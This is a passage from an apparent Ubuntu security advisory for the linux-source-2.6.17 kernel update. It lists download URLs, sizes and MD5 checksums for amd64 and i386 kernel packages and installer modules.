http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    50502 c13eecefce68e65441f2431e6e54526c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:     2448 25362b6cdee601920fdc0fba64694492\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    40790 8cedc390f9316032200774ded8c7edb4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   113554 a30b81e0d10efbbae1a62e68ebc69882\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    43992 b66792584a0b66178adc7a07fef24086\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    54026 70015d3219760077553b85e7d1a0a841\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   189516 821bf7103ff386970bffecb3ed757ba7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    40026 20c98bf3d5f6c98eb1bfade564d0f633\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   167752 cf2ebb8e98ab008732cea50938bdf102\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    60446 faa4e7d5d0215e35042b6cce5e3e67ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   154564 697e2eb7a49669702c622909839fbe9c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   314684 855b49aa7415915d8a935ceedc0b4771\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   105980 9b9f7147fed232c2fc56d90773c5eb27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:  1904310 8d7ab13c1355fdf2ccac6291863b8af5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.41_amd64.deb\n      Size/MD5:   906822 b8ea119280393d2ecaebbb4687cf3b27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.41_amd64.deb\n      Size/MD5:   910098 5ac08554cd7ef8b376bab0be799ee24c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_amd64.deb\n      Size/MD5:  7429904 6bb0ad99b25007fe4a3027a93dbb5f3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.41_amd64.deb\n      Size/MD5: 23873330 b5e42e61008b93d405b10ed2e37c5085\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.41_amd64.deb\n      Size/MD5: 24448136 71799e57ed00440061acaa79217439a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.41_amd64.deb\n      Size/MD5:  2340624 6dd4bc0284c87f5b09078459f0957960\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.41_amd64.deb\n      Size/MD5:  2339472 47a3607cf5b45685282cbd13e24dcf44\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_amd64.deb\n      Size/MD5:  1771538 46807ab2bd26adcc2a430b9ef2414733\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    16788 3aa5eccb6772c1c9d89396c93c96a0a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   279176 473c8c18b1caed5f000e26d436e59d0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   256916 7307e06f46448b2679381bfce9dd6ff5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:  1048468 2abd1fef2e34a4dba512bfd840a8ab58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:  2103898 e2a8f855a1c71776ef2ccef10b19547d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   164432 4161c56c5aadaf6017a7f5a17f516c98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    10502 7ff5d62d57d1f600f2a941f71118c0cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    93364 377ddc29f9d0a225cbeccf6024ed3bd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    52570 b02078ae7fe65152b70162ed23308408\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    39804 04f72ee8cf83b5cd99e3015ace825094\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    79812 04228c70da1a6612309409b7a90a120f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:     6334 60de3d973103bd26d3dc2f54cefb856b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:     9372 ee591b3f8efe0c8f494372d764cf4a79\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    62720 036e650f1e2370ae83d0c6d2e40f0b78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   138626 9a8a28499ccb16f86d4f11be74f8daf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   115694 ec57055245feb642932298995b1c711e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    90606 a004d2d8d9b8cd7eeb995373ac490ec2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:  1286182 663cdd07feff2bfdc92455eb455e07d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    80596 7c60a6a53aa20971b86a690805a4502a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    13478 fc373244f4655c4431c4146a85caffd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    76278 49121f16220fa17ef334135a8656ae3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    36064 5750191512c6029ce217dd280db1a08e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   151842 052e8c380401bb227e65a4d4cc98a39a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    53544 03719e52d55c4acb8b4a347d6632584e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:   323446 4c72d0968b1de7d289c2a9130bccbe89\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    21210 9510311672bd693480f110c757a91998\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    23812 fb2e58840c7777436c6228116595bda1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    43872 767eb7ebf75c9096b34a536d6fdb0f46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    44474 7696fa8379ed4969394718dbdb28291c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   104802 d7545efcfc8d2c9f3912ffbd5a579021\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    49414 a67a49c77dfb15f95d1c6c3c86d42136\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:     2362 d4cd0a14a708d6d0990e83c1eada3d8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:     2388 cba02365501509ca84c05051a80e4e18\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    35308 a1469ff2a99207d5e7f9475d6974dd99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    36728 b5fccb48e3829ad949f6b8a6c72ddf31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    98288 dd0f27b57f8c71899deef1f5e4926d5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   103512 113b84ff4e3f891e126c4ca072d757c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    38468 b249d8812f56b3190b88525606bb3247\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    39218 d85c9a5efcaafedb3f94464f08259c4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    44258 4b0e010bb3bbb49cfd58961bb6125402\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    44668 e47d84fcb99bf4def88f19e6dc1015fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   172756 337d97010e6ada5d3e7c1feb3da1079e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   175180 515b1be35422d7d0990551ec6bf52d55\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    33748 591142321ec2285d50a92dd29daa43b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    34708 8c68a497c61d5122777023e87f06c1d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   140562 43eb25327db6e7c12da28be7b7047772\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   143824 366cc2124b233f830e5c44d49684f463\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    51750 58da1629078e7c737c0af3e1b4a649bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    53172 fdb9b5d217e6ae5203e92c80655e006a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   131600 88d5559b4f733ecb9728c3579becaaa7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   139180 8d890bcca576a66d83f513b5734eb053\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   288306 af75c566015a2cc731dd1deb3e570c02\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   290702 0ee0a0eb828a396707253197454a645b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   103542 7e8d620147bd6ed293dce46ecdab9ad1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   106714 7040843943185f0be1df1dc01c0adcec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:  1737778 22b50d5e94b9e7b7ca50824744975751\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:  1802960 150c9bf1da3fd46140fabf504d61a832\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.41_i386.deb\n      Size/MD5:   917292 61810421b4fd39f633183e92d3804bcb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.41_i386.deb\n      Size/MD5:   908720 8f3e333224e56a60ba1fa839a9b06972\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.41_i386.deb\n      Size/MD5:   920736 f9f4cbb6998594af377df1cae94383a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.41_i386.deb\n      Size/MD5:   918694 a89e836481e60e8295c10568521fb016\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_i386.deb\n      Size/MD5:  7425178 9aa67fb053ecca3c5c9d475dbed9adfe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.41_i386.deb\n      Size/MD5: 22851648 c97e45392d212f13ec9a96731a02186e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.41_i386.deb\n      Size/MD5: 22987972 5ef2cf592ec596358c6e02b78ba6d592\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.41_i386.deb\n      Size/MD5: 23797222 de5c8b4d5c14db82b0fd0358e74c375d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.41_i386.deb\n      Size/MD5: 23295450 2952a481c7f16f992e80476df38709f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.41_i386.deb\n      Size/MD5:  1961980 5afac1e959b044536c20aafd277515a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.41_i386.deb\n      Size/MD5:  2029996 c2a94101d0d01f15aee853aa49e36cb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.41_i386.deb\n      Size/MD5:  2067638 e88db016cd8fb015a3223a02475c1595\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.41_i386.deb\n      Size/MD5:  2029676 1b051e4c57eeb4a7034c693d2bbdf35c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_i386.deb\n      Size/MD5:  1771552 bf6dca2e16fc4ae2213b39f31668c431\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    15368 5985a726ec469d88b17e97a7789e0376\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    15738 2d0fd50c2b93554e66594640e08be993\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   253320 4a7f0bc31462f13f331f4cf893d7005a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   263866 b02e15367a02b28b75e5a56ce8733229\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   220354 bb615e5d0185cdfe6590ecb4d8998fae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   227604 60320bc389867b31674510d251b87031\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:  1048378 958e7ff17559157fb7a953ae531d645e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:  1048498 0f4267342167e6957815144d4126fe14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:  2092192 0796bd911b3392bc1dca0b650c9fa7bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:  2142992 88d9b6496923d9dc8608df532717563c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   156870 a6e477fc7474a29c643003856f25ddf3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   152152 2dc85d06b51491c74e02d74f62edbbbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:     9176 3e6f7e5f4f220e2b98cca56242a8643c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:     9654 bc27e02955eae9393bc1079d7fb5bcd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    79216 321451ba1310580256925668f53b8986\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    81768 55b585802e7c9629c719732f03395363\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    55086 faebe4925bd54435b1724d760ffe1bee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    56724 2438bb6f34213c190b945f46006c0ca1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    34484 260f16152e779368d5b077becd39c357\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    35410 869c86fa1eeed27bef128d6d89a1003e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    85870 1fe5b54f587dede7aa6595bfb871828c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    87428 5145f1eb370ffa6f05b6fc25565e7725\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:     6080 9d92923af976a45a27ecde8ff3a948f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:     6096 c11277bdc7fae882b4257c2e338b2b43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:     8602 d4a9b2aa0d2f952d94b72ebca55a1601\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:     8902 073cd3241cc5a4275b2093c6a1c5ce00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    52686 72c5a2aa687c01fb134e35aa71d19b42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    55118 ae4b4d0858dc9dcba24d98285438d284\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   129970 b75c31f992ec4eb18424df3e54f6494a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   132972 0f09435d090729a7461db1de834383df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    99870 5c3780f614be1b33c5fbcb3b9ed3c61d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   101172 840414c7441733e7e25728e7ee750a27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    79566 721e95573132143fe0a3eec5351b185c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    80934 77721e781b439ca031e0270591fd261b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:  1394954 72c4acf78619059a1f75147e17436f46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:  1398080 320a65e4d464538828ad11356f4ee54b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    69150 85299c42587a91be5fee41c61b35ec45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    71082 8f0769d4a009dcced37d12dac82a35cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    11424 bf7ab78acf84524d9add2b6b0aba100e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    11980 b0d76683fae8ac4c9f6517a4a7933960\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    62478 52f70b40e9a2915afe11bacf3d8d5d29\n    